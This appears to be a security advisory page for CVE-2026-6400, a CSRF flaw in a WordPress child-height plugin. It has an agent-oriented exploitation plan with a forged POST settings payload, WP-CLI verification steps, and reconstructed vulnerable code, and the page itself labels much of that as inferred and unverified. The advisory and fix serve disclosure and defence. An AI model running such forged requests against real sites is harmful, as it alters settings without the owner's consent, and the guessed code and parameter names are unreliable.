WP-Safety
CVE-2026-6400

Child Height Predictor by Ostheimer <= 1.3 - Cross-Site Request Forgery to Settings Update via Plugin Settings Form

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.3. This is due to missing nonce verification in the options() function, which handles plugin settings updates. The form template does not include a wp_nonce_field() call, and the handler never calls check_admin_referer() or wp_verify_nonce(). This makes it possible for unauthenticated attackers to trick a site administrator into clicking a link or visiting a malicious page that submits a forged POST request, causing unauthorized changes to the plugin settings such as unit preferences to be persisted to the database via update_option().

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.3
PublishedMay 19, 2026
Last updatedMay 20, 2026
Affected pluginchild-height-predictor
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-6400 (Child Height Predictor by Ostheimer) ## 1. Vulnerability Summary CVE-2026-6400 identifies a Cross-Site Request Forgery (CSRF) vulnerability in the **Child Height Predictor by Ostheimer** plugin (versions <= 1.3). The vulnerability exists within the `opt…

Show full research plan

Exploitation Research Plan - CVE-2026-6400 (Child Height Predictor by Ostheimer)

1. Vulnerability Summary

CVE-2026-6400 identifies a Cross-Site Request Forgery (CSRF) vulnerability in the Child Height Predictor by Ostheimer plugin (versions <= 1.3). The vulnerability exists within the options() function, which serves as the callback for the plugin's settings page. The function processes configuration updates (persisted via update_option()) without performing any nonce verification. This allows an unauthenticated attacker to forge a request that, if executed by a logged-in administrator, modifies the plugin's settings.

2. Attack Vector Analysis

  • Vulnerable Endpoint: /wp-admin/options-general.php?page=child-height-predictor (inferred from plugin slug).
  • HTTP Method: POST
  • Authentication Level: Requires an active session of a user with manage_options capability (typically an Administrator).
  • Vulnerable Function: options()
  • Impact: Persisted modification of plugin settings (e.g., unit preferences, display options).

3. Code Flow

  1. The plugin registers a settings page using add_options_page() or add_menu_page(), assigning the function options() as the display and processing callback.
  2. When the administrator visits the settings page or submits the form, the options() function is executed.
  3. Inside options(), the code likely checks for the presence of a submit parameter: if ( isset( $_POST['submit'] ) ) (inferred).
  4. Upon finding the submit parameter, the function iterates through expected $_POST keys and updates WordPress options using update_option().
  5. Critical Failure: The function fails to include a wp_nonce_field() in the HTML form and neglects to call check_admin_referer() or wp_verify_nonce() before processing the update_option() calls.

4. Nonce Acquisition Strategy

No nonce is required.
The vulnerability report explicitly states that the options() function lacks nonce verification and the form template does not include a wp_nonce_field(). Therefore, the request can be forged without any CSRF tokens.

5. Exploitation Strategy

The goal is to demonstrate that plugin settings can be changed via an unauthenticated POST request (simulating a CSRF attack).

Step 1: Discover Setting Parameters

Since exact parameter names are not provided in the CVE, the agent must first identify them:

  1. Log in as an Administrator.
  2. Navigate to http://localhost:8080/wp-admin/options-general.php?page=child-height-predictor.
  3. Execute browser_eval to extract the names of the input fields:
    Array.from(document.querySelectorAll('form input, form select')).map(el => el.name)

Step 2: Forge the Settings Update Request

Once the parameter names (e.g., chp_unit, chp_precision — inferred) and the submit button name are known, use the http_request tool to perform the update.

Example Payload (Inferred):

  • URL: http://localhost:8080/wp-admin/options-general.php?page=child-height-predictor
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: chp_unit=cm&chp_precision=2&submit=Save+Changes (Parameter names must be verified in Step 1).

6. Test Data Setup

  1. Plugin Installation: Ensure child-height-predictor version 1.3 is installed and activated.
  2. Shortcode Page: Create a page containing the plugin's shortcode to ensure settings are active:
    wp post create --post_type=page --post_status=publish --post_content='[child_height_predictor]' (Shortcode name inferred).
  3. Current State: Record current settings using wp option get <option_name> once parameter names are identified.

7. Expected Results

  • The http_request should return a 200 OK (if the handler renders the page) or a 302 Redirect.
  • The response should NOT contain a "link you followed has expired" error (which would indicate a nonce check).
  • The targeted WordPress options in the database should reflect the values sent in the forged POST request.

8. Verification Steps

After sending the http_request, verify the change using WP-CLI:

  1. Identify the options modified by the plugin: wp option list --search="*chp*" (inferred prefix).
  2. Check the specific value: wp option get <identified_option_name>.
  3. Confirm the value matches the payload sent in the exploitation step.

9. Alternative Approaches

If the settings page submits to options.php (standard Settings API) instead of its own URL:

  • Check if register_setting() was used without a proper sanitize_callback or if the plugin manually processes admin-post.php hooks.
  • If it uses admin-post.php, the target URL would be /wp-admin/admin-post.php with an action parameter matching the hook name registered by the plugin.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because it lacks nonce verification in its options() settings handler. This allows an unauthenticated attacker to change plugin settings, such as unit preferences, by tricking a logged-in administrator into submitting a forged POST request.

Vulnerable Code

/* In child-height-predictor.php - inferred function structure based on research plan */

function options() {
    if (isset($_POST['submit'])) {
        // Vulnerable: Missing check_admin_referer() or wp_verify_nonce()
        update_option('chp_unit', $_POST['chp_unit']);
        update_option('chp_precision', $_POST['chp_precision']);
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }

    ?>
    <form method="post" action="">
        <!-- Vulnerable: Missing wp_nonce_field() -->
        <input type="text" name="chp_unit" value="<?php echo esc_attr(get_option('chp_unit')); ?>">
        <input type="submit" name="submit" value="Save Changes">
    </form>
    <?php
}

Security Fix

--- a/child-height-predictor.php
+++ b/child-height-predictor.php
@@ -1,7 +1,8 @@
 function options() {
-    if (isset($_POST['submit'])) {
+    if (isset($_POST['submit'])) {
+        check_admin_referer('chp_save_settings', 'chp_nonce');
         update_option('chp_unit', $_POST['chp_unit']);
         update_option('chp_precision', $_POST['chp_precision']);
         echo '<div class="updated"><p>Settings saved.</p></div>';
     }
 
     ?>
     <form method="post" action="">
+        <?php wp_nonce_field('chp_save_settings', 'chp_nonce'); ?>
         <input type="text" name="chp_unit" value="<?php echo esc_attr(get_option('chp_unit')); ?>">
         <input type="submit" name="submit" value="Save Changes">
     </form>

Exploit Outline

The exploit targets the settings update logic which is executed upon page load of the plugin settings menu. 1. Target Endpoint: /wp-admin/options-general.php?page=child-height-predictor 2. Method: POST 3. Authentication: The attacker needs to induce a logged-in administrator (with manage_options capabilities) to visit a malicious website or click a link that automatically triggers the POST request. 4. Payload Shape: The POST request must include the 'submit' parameter along with the settings keys the attacker wishes to modify (e.g., chp_unit=custom_value&submit=Save+Changes). Because there is no nonce check, the request will be processed by the server as a legitimate settings update.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1681a8-5f2e-45f1-96d9-797b13644607?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database